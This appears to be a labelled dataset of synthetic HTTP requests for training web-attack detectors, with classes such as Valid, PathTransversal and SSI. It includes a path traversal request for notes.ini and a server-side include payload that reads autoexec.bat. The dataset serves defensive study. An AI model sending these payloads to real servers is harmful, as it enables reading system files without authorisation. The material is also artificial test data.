ETag: W/"2ANeCDXt.05qwc2sU"
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Fri, 05 Feb 10 03:15:09 UTC
If-Unmodified-Since: Thu, 29 Jun 06 04:45:08 UTC
If-Match: *
If-None-Match: "aYaoVac9tiu6nZ4"
If-Range: "ezD-.nB7Cl5HP6e1"
Max-Forwards: 4
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: pVlh asmms=iwoa
Authorization: 4h2sas iuou=nHae
Range: 1364-
Referer: http://Gystm.net/plEye/8yhaS/uece.jsp
TE: deflate;q=0.3,trailers,deflate;q=0.1
Trailer: Date
User-Agent: oer0teo (esd5yL-8@B; roQQAC; b_Q3g2r6EL; tTflvpTx)
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 415x959
Via: eOee2/8.3 151.45.48.186, 6.7 www.srseeao.html, 5.2 www.oduenEr.html
Transfer-Encoding: identity
Upgrade: 8wp/1.6, oh2/7.9, litly/2.3
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 210.73.117.164
X-Serial-Number: 953974207660518
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 70
Start - Id: 16864
class: Valid
GET /2GgKCgIDallbbKJcG/eGDo7mxvtS/erHtssfilswwhhsacwe/wn/hKq0wmdRU9f/a1ny6t9iaqhttet7me/elIyyc/nx4x.tiff?5rut=%5Drtwynoncarn&kelniJrsoH7an=PmRtnpdpaeq&net=11351909 HTTP/1.0
Host: 186.211.48.61
Connection: close
Accept: */*
Accept-Charset: euc-jp, hz-gb-2312
Accept-Encoding: *;q=0.1
Accept-Language: og2cnc-eoyv1d, tlsp-Pvge;q=0.5, gdw-thibs2
Cache-Control: no-store
Client-ip: 127.221.48.135
Cookie: y3l2noqewclwyno=erl5efe 2;dS=h;eijL6xy=eLeiotatm;thypfpara9ecirv=76
Cookie2: $Version="9"
Date: Fri, 15 Jul 05 15:31:45 CET
ETag: W/"DTmAWxGg_Ca6HBmMC.v"
Expect: eadt7tHr
From: oieuzw@OnwCatDke.cz
If-Modified-Since: Sat, 20 Nov 04 19:11:02 UTC
If-Unmodified-Since: Thu, 04 Oct 07 11:06:21 GMT
If-Match: "J9wr5BYVm3Bp2KUJMX3"
If-None-Match: *
If-Range: Tue, 11 Jan 05 13:42:46 CET
Max-Forwards: 6
MIME-Version: 8.8
Pragma: LIH='mr'
Proxy-Authorization: Basic aG5laXc6ZGxxblU=
Authorization: Digest username="9If4ua7"
Range: -2762
Referer: /nkmeh/esst/eEyireo.dll
TE: gzip,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.5 (compatible; Konqueror/7.1; Linux i386; oeAWaserA)
UA-CPU: Sparc
UA-Disp: 199,9704,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x8989
Via: 7.0 84.1.0.194, 3ie2/4.2 132.60.41.157, FTP/8.3 www.rohssrc.shtml
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 5.165.70.120
X-Serial-Number: 926077
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16864
Start - Id: 27364
class: Valid
GET /tawLt0CibVilmgthH.msf?elf=75&meE=3780&4MD3rmYbody_=2150822&arft5cire=admin7Ssih%3DinlE&SosFs=nrina%3Dretmp2ttiteie&8ntshxD2awr=o&t6hntegragoyg=stcrcpswhere1C&oziesltwMfo=8210 HTTP/1.1
Host: 232.133.146.154
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: beetAtlb=tRx
Client-ip: 231.70.129.217
Cookie: weutsios8=594
Cookie2: $Version="425"
Date: Sat, 29 Oct 05 19:23:20 GMT
ETag: "3ooz@O1DCCjzfQ_jl"
Expect: 100-continue
From: etr2@eeroi.de
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Sat, 20 Jun 09 05:06:44 CET
If-Match: *
If-None-Match: "PqQuZiauDwmJ@b149CaT"
If-Range: "HUngjKF@-sPQCc5Q"
Max-Forwards: 517
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: MeYm toondn=clnamd
Authorization: NTLM M2hoaXBRcjlkaVRvY2dlanR6cnduNGVudFBmYXlJYmxoaGRlNQ==
Range: 5279-
Referer: /qeCov.wav
TE: trailers,trailers,chunked;q=0.8
Trailer: Cache-Control
User-Agent: nBinph6sa/3.1.8.5.4
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9698x542
Via: FTP/5.0 93.140.53.105
Transfer-Encoding: ieon
Upgrade: eeW/8.4, 80lvm/8.7, iuez/6.4
Warning: 877 60.179.127.50 "ccGMviphn5uaaes" "Sun, 24 Jun 07 15:48:47 UTC"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 7259766093580029
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27364
Start - Id: 34536
class: Valid
POST /c_aNEEocea/at-HzqQ6VlIBSFv3loHn/XconnectxbodyHSRf/er6mtonsiMet9T/ueimrtr2fDgchRxsasS/tlb2/nawn/6FJUl/StRfqenjwlhydtEd/5S.pl? HTTP/1.0
Content-Length: 18
Content-Language: 6dil6,EK
Content-Encoding: compress
Content-Location: /tcyio/n8aenrae/tItn/tmeaf/thope7er.asmx
Content-MD5: YzBlcmVhNmVwYW5hc29zYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 05:34:04 GMT
Last-Modified: Sat, 14 Apr 07 01:23:22 GMT
Host: 81.8.176.178
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: m-i
Cache-Control: max-stale=5
Client-ip: 217.109.107.241
Cookie: 1kncwz-T=efeolcoastmb535;aoloulherenm=5;sWesn=g3vhn7;i0T2edntede=/d4me;akocd6mohElhc=xs&66d9ora2\5h;EeAe=232654555
Cookie2: $Version="025"
Date: Wed, 22 Aug 07 04:37:31 GMT
ETag: "mRjdLgMUo4W-ym0RUck"
Expect: ehcptate
From: aiiTbdt@stretps.it
If-Modified-Since: Fri, 13 Mar 09 10:51:06 GMT
If-Unmodified-Since: Thu, 06 May 04 09:28:15 UTC
If-Match: "x._oXgjjiP@Y0FeE"
If-None-Match: "CPTyi1mUZ-W7nKzGvx"
If-Range: Sat, 14 Feb 09 03:35:50 UTC
Max-Forwards: 4214
MIME-Version: 0.1
Pragma: Yj2j='eizt'
Proxy-Authorization: Basic ZVMyZ2F0OnN1cnRldmN5
Authorization: NTLM aHJzYU5laGlic09iYWlvZGlzZW1oYTlFc2FkdTZ5b21l
Range: 934-
Referer: /Rtmaein.aspx
TE: chunked;q=0.9
Trailer: Via
User-Agent: aNpsosrZN (cLy@I_i1; idWrnXx59; u2rrcuW; eiDA0W; dqlZaKVbeJ)
UA-CPU: MIPS
UA-Disp: 245,2195,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 066x785
Via: 2.7 www.oz5ana.jpeg, FTP/1.5 www.9iti.png:749
Transfer-Encoding: gzip
Upgrade: 6Oq/6.2, ioU8nf/2.3
Warning: 065 65.77.102.167 "nhro5a2" 
X-Forwarded-For: 38.219.193.159
X-Serial-Number: 52771929
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

gpYZ1ue6AeT=994861

End - Id: 34536
Start - Id: 18263
class: Valid
GET /dlESredrc2cotetegde/bie.gif?cnTmb=xtn&76ucnwacBdo=5979&C8eet4ieWepfybh=exec+%28&7pLUAYE8Y4U=8643731&sqylbctt=lAHBw0SQ7HQl&iencf=%292%3Cgh5uN&qe5rel3yh=Co1lfxaitos&hrnnSfma52oM=5&2zanld4ouqm=81241122&ro5=sgeh%3A%5CariqoT&netn5ohtIR3lsz=bRv.Gl0n&reic9e=uo3lar&z8BXL7v=qre&stoRs=el HTTP/1.0
Host: www.ooexmr2hf.org
Connection: close
Accept: audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: awhi-e;q=0.0, yysalshG-3, raA-s;q=0.5, iv-6iOfs1h
Cache-Control: no-cache
Client-ip: 168.79.189.179
Cookie: ete=tsjmea2srerlieDrAl;agirtlsonaEset=9037;edchofRieputu=609412;optL4PNnwherewUobject=gu9g;troabeben=dnoretrtrss
Cookie2: $Version="885"
Date: Thu, 20 Mar 08 23:31:50 CET
ETag: W/"Z9h-CIcfuQIcSArNtF"
Expect: 100-continue
From: Aa02@teEtrsmi.ch
If-Modified-Since: Mon, 08 Sep 08 22:41:20 GMT
If-Unmodified-Since: Fri, 01 Jul 05 19:18:32 CET
If-Match: *
If-None-Match: "TL9Zl1WbG6s90P_Lr"
If-Range: "ccV1iJubUoXd91sk"
Max-Forwards: 050
MIME-Version: 7.0
Pragma: tfrxarr='hri'
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: Digest realm
Range: -043,7-,317257-
Referer: /raf6O/gotceEna/mcSglorl/hthA.js
TE: chunked;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/7.6 (X11; U; SunOS sun4u 1.7; qr-pt; rv:4.9.2) Gecko/22148130
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 364x686
Via: G4ts/5.7 www.tn9g.css, FTP/5.3 66.8.19.6
Transfer-Encoding: 0ns7e
Upgrade: ljbh/9.3
Warning: 014 249.54.239.43 "agN4e4iw1ae5s" 
X-Forwarded-For: 45.41.138.217
X-Serial-Number: 561642112
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18263
Start - Id: 23546
class: Valid
GET /xDE8SzC/anvfza6doc/a63GiZOFPebddmOlPG/niiegrae/cobjectml/ssOiivhfp7aieuN/ikz3/v9cz-@b54D/5ajm/8zQhzYl256t/wetoid.nsf?ostOaen=1tapsuacceptEt&oe=i&dal=%7Cstdintimgaas&M2QJzinsert_L=a%3B&HcnSyietsTe=nWuwXd4f.F&uhmtepDt=hhob4oc6ta49p+&itrwinnmoiT8ceu=0575651&dhIdpoats=otcrtd HTTP/1.1
Host: 223.13.104.112:80
Connection: close
Accept: text/*, image/png;q=0.7
Accept-Charset: x-mac-roman;q=0.1, x-mac-chinesesimp;q=0.8, x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 147.104.162.8
Cookie: ehllpOlnliurue=havingls:enPjfch;yce=a;eosAapali=ih7Qh_C
Cookie2: $Version="925"
Date: Tue, 20 Apr 04 19:33:16 UTC
ETag: "ATZ1OC@4L_0pKrDwRh"
Expect: 100-continue
From: Iqdva@bayiga.ch
If-Modified-Since: Mon, 14 Jun 04 04:50:41 GMT
If-Unmodified-Since: Wed, 20 Feb 08 17:54:07 GMT
If-Match: "yUeeyqQZT4iBi1tvcDW"
If-None-Match: "@fkat.TTpeG6IlTP8v"
If-Range: "_6tyVzsKKAS.O-c"
Max-Forwards: 8
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic bnVoc2JvOmVBcnlpaUNi
Range: 9-582047,9-,23678-00
Referer: /ords/oiAcGnet.dll
TE: gzip
Trailer: Referer
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 3.9; cn-tn; rv:8.8.3) Gecko/11271789
UA-CPU: StrongARM
UA-Disp: 3395,981,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4426x0282
Via: 5.8 www.ebizvrPA.png, 7.8 www.eswo.css, 7.4 119.130.145.20:6898
Transfer-Encoding: compress
Upgrade: Els/5.8
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 4147568575468348
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23546
Start - Id: 15705
class: Valid
GET /snphmtPctnE6TEeueitu/tM.JQo94tTz/usapnd0pisz/lPR1AiULmWCqzE/i2FNl.mdb?aylEsq9iaho=rthv&tlr=ndiU&NBydSCIlink=e3wTUK3_nPa&escatTseqrc3el=ygMEYqG7E_B9&rsrruhtRstBs2nt=9xlcX&loeVsunroncAn=tm0eniootnede&fdat=s%40rc+%3Ee0%3BSi2%40&3lieephsE=s3i8IOzt3tbPc&nOvOl=netcirtee%29nrn&hedtee=58&tLieFdiN8eq2=eCsI&hBEtiRmIyhoz9=n%3F3e&v9fHeaiiapstnk=ie HTTP/1.0
Host: www.eeaxiee8or.ch
Connection: close
Accept: video/quicktime;q=0.8
Accept-Charset: utf-7, iso-8859-1, iso-8859-4;q=0.0, euc-cn;q=0.9
Accept-Encoding: *
Accept-Language: ds-1r6, aora0-aer, ve-kE2h7cek;q=0.0, 4-cr9aouaO
Cache-Control: max-age=8
Client-ip: 136.105.214.240
Cookie: mgqd6yih= qk6whereu;tbtPjheZp3=scriptz4aemochag7epSEsystemEe
Cookie2: $Version="81"
Date: Tue, 07 Feb 06 02:28:30 GMT
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Mon, 29 Nov 04 21:34:36 UTC
If-Unmodified-Since: Wed, 21 Jan 04 23:37:59 CET
If-Match: *
If-None-Match: "79tYyoyJ1Zp1QC8OiGw9"
If-Range: *
Max-Forwards: 3246
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: ilie a4w9w=thndvf
Range: -2
Referer: http://www.tkst.biz/ceTrsep/soipft/sReeco/oeuo40l/r7bi.sh
TE: gzip
Trailer: Trailer
User-Agent: jlin (qKl.VwgX2)
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: FTP/3.4 249.83.18.65
Transfer-Encoding: oEEkus
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 451 194.177.41.7 "maNtqhbf" 
X-Forwarded-For: 139.13.197.94
X-Serial-Number: 9307845835407773
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15705
Start - Id: 16226
class: Valid
GET /qjIOt2XOto-q6q7/d2osritd7o9ntUil/41P/0ESyYkjuXuoLB/0noqtjo/QatEOshh2/kx6n3_74KZgSYb/egZ/ws5pautoexecqbinDP1GE/rzwEZ/2g1L0stmp.gif? HTTP/1.1
Host: 124.131.11.99
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.1, gzip, gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 62.125.4.9
Cookie: 181VI=ieusr&o;T4openevalI=heatcod56hrrrTti;itoehxaiahhee=261897;tdnsrrpwto=o5rytditlatot;bVSM=tZVtDkUP9
Cookie2: $Version="75"
Date: Wed, 10 Jan 07 24:27:35 GMT
ETag: W/"YVDW8cf65gcaYqNOx"
Expect: 100-continue
From: l8reS@iteois.org
If-Modified-Since: Sat, 10 Apr 10 03:31:15 GMT
If-Unmodified-Since: Sat, 10 Jan 04 24:01:08 UTC
If-Match: *
If-None-Match: "hi2zmvxdc0YCHtYZ"
If-Range: Sun, 22 Jun 08 16:28:25 UTC
Max-Forwards: 6
MIME-Version: 7.6
Pragma: deh=n3eenros
Proxy-Authorization: Digest cnonce="enu3Fe"
Authorization: Digest algorithm=MD5-sess
Range: -1,640-,-33570
Referer: /ohtm.php
TE: chunked
Trailer: Max-Forwards
User-Agent: mVkupv http://www.tdfhaI3t.gov
UA-CPU: 68000
UA-Disp: 202,714,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 128x839
Via: 0.3 2.191.138.67, 5.0 www.cciwwxBe.tiff
Transfer-Encoding: identity
Upgrade: eueb/4.4, fL8t/8.5, 0ts/8.5, 9thZz/8.8
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 57.123.138.159
X-Serial-Number: 1613720445559
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16226
Start - Id: 17213
class: Valid
GET /n4nxERCilagbuRm-r/etaut5ih2nrne/soeyuEkYmLEXIN0Y/RzhttpOMBOJv.Adocument1_/ijeavhpdi/-v-/oTG3t-bsDdjP237hqd/rdslu4Ehnx8g/oodsign/gIA9L/fA6dEF_j.swf?x1Ez=45&nnn=foFmlrsed+kt3gleestdinc&ntdinbqp1lai=ysdiheeomTematereY&0eooiioH6t=4937931148&aoA8tfoiso4=access_log&Sa=ns6WftwyRqy&2dht2=12139449&5servicesHnnoPapselect=w+t&M4rosc=tuwa%28rhw HTTP/1.1
Host: 37.47.110.118
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.9, euc-cn
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 106.60.218.207
Cookie: wTaaZbfcti7=eWMsnqy7G
Cookie2: $Version="5"
Date: Wed, 23 Mar 05 04:34:42 CET
ETag: "VnVj3T3gmtLTjcIn"
Expect: 100-continue
From: esabrd@aecmV.uk
If-Modified-Since: Tue, 23 Sep 08 14:54:00 UTC
If-Unmodified-Since: Mon, 25 Aug 08 18:35:22 GMT
If-Match: "beGR2LQe1C4MH6i"
If-None-Match: "L3eJWdmZ__LQ-Z7tMre"
If-Range: Sat, 18 Nov 06 15:32:03 CET
Max-Forwards: 15
MIME-Version: 6.9
Pragma: ede5lt='b7h2pens'
Proxy-Authorization: dRini wnbheet=snah
Authorization: NTLM dHNhdGs4Y2dheWVoNm5ORWVpaG5JZ2VhbnNoYWFlZWRzZWViZWUwcjlu
Range: -188059,160660-4,9392-
Referer: /mRtsgUg/ekca4Rn0/olgcz.jsp
TE: gzip;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/3.1 (Windows; U; Win 9x 6.9; ca-ho; rv:0.6.0) Gecko/03524472
UA-CPU: 68000
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 5.5 149.161.227.241, 4beoti/1.7 www.theYrov.tiff:578, 9.0 www.G6cheiA.gif
Transfer-Encoding: deflate
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 357 238.206.196.68:26 "c6hanltldc5sauds" 
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17213
Start - Id: 27542
class: Valid
GET /-Ksbinsert7m/hTrIYP4c5.jpg?jeTor=C2pc5xml%26arcph1d&Alpr1rse=6408296491&ihtjyoayrnr1ocd=biefSrotrt&ojeh930=eblWpise7&C5mblUtis=71032 HTTP/1.1
Host: 165.129.151.222
Connection: eda4iazt
Accept: application/*, image/*;q=0.0, video/quicktime;q=0.7
Accept-Charset: iso-8859-2, x-mac-cyrillic;q=0.2, utf-8, iso-8859-15
Accept-Encoding: 
Accept-Language: nukiixuj-ceontL, ey6s8-sherrOd;q=0.0
Cache-Control: max-age=32
Client-ip: 252.13.177.85
Cookie: GxXVCK220admin.q=988448;Y5uW=:a|oeiorn7tr9;yeq8r0c=ottsam3;O2nhincludetelnet=8765496
Cookie2: $Version="703"
Date: Tue, 03 Jun 08 10:30:14 GMT
ETag: W/"Ud4azIHp.o.ZdS8s"
Expect: 100-continue
From: ru4em6@gcCndrd.cz
If-Modified-Since: Wed, 16 Apr 08 02:27:40 GMT
If-Unmodified-Since: Mon, 11 Sep 06 08:26:57 GMT
If-Match: *
If-None-Match: *
If-Range: "BeUnN4T_4ikAvf7"
Max-Forwards: 07
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: dhcn enEer7=Raunri1
Range: -57147,586891-,-6
Referer: /ijshhue/tuh0e/uettlee/iiei.php3
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.2 (X11; U; Unix 3.1; ea-we; rv:0.8.8) Gecko/21042596
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: HTTP/0.0 77.223.143.196
Transfer-Encoding: tjcora; wa6hn=Ces1fAc
Upgrade: hfe/6.2, eoht36/4.2
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27542
Start - Id: 45057
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.coh0hF9Ni.st
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: drhTuhio-u;q=0.5
Cache-Control: only-if-cached
Client-ip: 4.109.212.12
Cookie: YmailPR5o1.wHIe=aD4ys%ieroptZ$e\ozms;mzre=38150;hi3bRn=42952258;elrw0jwtrohE=hzpKys
Cookie2: $Version="345"
Date: Sun, 25 Apr 10 10:20:32 GMT
ETag: W/"VI05iHgMeDWsSIG"
Expect: 100-continue
From: hyrpijtS@yytf9mx9es.net
If-Modified-Since: Fri, 02 Jan 09 19:40:31 UTC
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: "rIGsar_3oCllg8h0ZHB"
If-None-Match: "GoqdBXduDrkbwhfn6"
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 217
Pragma: no-cache
Authorization: Basic aTluZTp0NjJ3cw==
Range: 09453-71450,00-30
Referer: http://www.I7yetiIi.biz/aVcnmeo7/ya9ildi.mpeg
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/1.2 (Windows; U; Win98 7.2; 3i-do; rv:2.4.7) Gecko/83178518
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: 8.1 www.sb7Lwe.jpeg
Transfer-Encoding: deflate
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 055 85.8.178.117 "rMtdnroe0tr7el" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 23020199164875
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45057
Start - Id: 17958
class: Valid
GET /qMhMulQSryRZzvrd1ZY/n4WVnW9zkv5WBbeIdW/hHNb7Cg/emjie/ltnjro0yiduwnb/mY/xY5Gp0oVEYyAShyFC4/ddc/eTL6hq/TP_group byVvin/qzehiotwsdw2he.tiff?68T961F_lhtaccesN=ftelnets&nmpjlcuo7yaoaao=ntn%24+d%271nr&escc=0&rtaeggEebbd=reTEle2prnadewtyne&griD9ny6os=rscripttgroup+by&5o0nHEtedknsn93=ut6H6oqVi&n8iGTt=61919&location8hxZuvb0inRo=olmeTohja8&VqlsESAk=4975&YerhahTt=009888&ptsaa=%27n%3Bch&WVpARgt=57084&Mwdorui=kl&n7b=e-ehttpimgmdocumentidRmdropo HTTP/1.0
Host: 132.182.56.55
Connection: axmtceg
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, gzip
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 37.34.160.155
Cookie: ainekycihn=38801963;tsu=61382999;e0xo=uit;7es=e9ioe@;pjbe4q8s6anpent=dt
Cookie2: $Version="104"
Date: Fri, 07 Oct 05 11:47:27 UTC
ETag: W/"wzh_Gr@NV_lP9Ag"
Expect: zihn
From: s5ttUe@xomggt.be
If-Modified-Since: Fri, 27 Feb 04 07:03:37 CET
If-Unmodified-Since: Thu, 26 May 05 03:02:06 UTC
If-Match: *
If-None-Match: "gFW7AA29gaTLU3sCL"
If-Range: *
Max-Forwards: 36
MIME-Version: 1.7
Pragma: n8xnolig=bwoonutl
Proxy-Authorization: Digest opaque="o8nmonok"
Authorization: Basic c2dhYWg6YXNpYQ==
Range: 6-3,883-113,10456-5
Referer: /iezewaa/tutv8sq/e3taT/gpip4ge.conf
TE: trailers,chunked;q=0.3,gzip;q=0.1
Trailer: Via
User-Agent: ebgjh/4.4
UA-CPU: PowerPC
UA-Disp: 5395,1752,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5744x7610
Via: 6.2 249.142.236.183
Transfer-Encoding: ncada; amhhue=2ngmtp
Upgrade: rtpie/0.2, s6qe/5.9, 8anbey/9.9
Warning: 243 www.t3moNn4.shtml:671 "6wh40ksieyhlBiAly" "Thu, 09 Oct 08 24:43:53 CET"
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 126359960937
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17958
Start - Id: 22113
class: Valid
GET /ji/ne/tdbohsanH/yopaueeoeySRskn/rvoenjSQ585HS5/63ofii.jsp?c14@@h.Rd=7&wdigta1aun=%5Dtsagg&uUrtc78=Tkrw HTTP/1.0
Host: www.ubautcuwun.uk
Connection: close
Accept: text/*;q=0.3, image/png, video/mpeg;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.3, x-mac-cyrillic, x-mac-arabic, cp-932, x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 204.187.68.18
Cookie: asuS=20;HeavJ=tlD
Cookie2: $Version="7"
Date: Mon, 23 Apr 07 12:57:35 UTC
ETag: "Eo5FYzDFb7Xyw5IhtlZO"
Expect: 100-continue
From: cemr@yhuhe3Dw.cz
If-Modified-Since: Fri, 21 Dec 07 17:46:06 GMT
If-Unmodified-Since: Mon, 23 Nov 09 16:30:53 GMT
If-Match: *
If-None-Match: "T-r0GBZOhSuXb@FzLR"
If-Range: Fri, 03 Aug 07 02:26:57 CET
Max-Forwards: 8
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest username="spkw"
Authorization: gtsru ohiiOQ=eo5xye
Range: 1976-
Referer: /mida0Iha.js
TE: trailers,chunked;q=0.0
Trailer: Range
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 5.1; ii-ay; rv:0.5.8) Gecko/64881889
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 9.7 www.vsaSi.css
Transfer-Encoding: e1s1
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 174.83.21.40
X-Serial-Number: 42920569636252963929
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 22113
Start - Id: 40562
class: SSI
GET /xVR@QYj3LZHn9l/ftp34qqFGcb/TT2H87nVr79/tF.js?tA1W=ouQQ95Wk0_B&group byVU-EdnKBZXX=vometa%2Bol+qs&he=tTTdtslg&malgedsrt=UmMtsd&xnautlityz8xi=7049&gm=mmudotonArues9otot&ijnLantncr=%3C%21--+++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&qa2sbsfpet=crdcmtvoyiwpcaeseo&ahavo1ksxut=24661280&8nijesd=7servicesne+&isto=87ApIf94USgp&ric=bd1Doefeit HTTP/1.1
Host: 217.78.177.161
Connection: keep-alive
Accept: application/*, video/mpeg;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: ued='ideiaei'
Client-ip: 99.30.78.189
Cookie: Viuzh=pnlike> epr6rsT;4feaynhDkid=itna'form;oteskrtl3t2=241
Cookie2: $Version="29"
Date: Wed, 21 Jan 04 18:50:11 UTC
ETag: W/"Dj0WChA0ftcfzanu3"
Expect: Dmgzlepg=aTdpeoAa;8eizrast=eadti
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Thu, 22 Jan 09 07:34:29 GMT
If-Unmodified-Since: Sat, 04 Mar 06 21:02:32 UTC
If-Match: *
If-None-Match: "hZipGUw1Hlf3lHMr8yC"
If-Range: Sat, 30 May 09 10:53:02 CET
Max-Forwards: 53
Pragma: A='o'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest realm
Range: 488078-9765
Referer: /cttd/loeno3e/gxsl/eNnuc6tU.bin
TE: chunked;q=0.6
Trailer: Pragma
User-Agent: aKluzselt5/9.2.8
UA-CPU: PowerPC
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: HTTP/3.4 203.239.152.90, HTTP/6.4 36.123.89.29, HTTP/5.6 www.nanaigs.png
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 93.136.204.39
~~~~~: ~~~~~~~~~~~

null

End - Id: 40562
Start - Id: 36659
class: OsCommanding
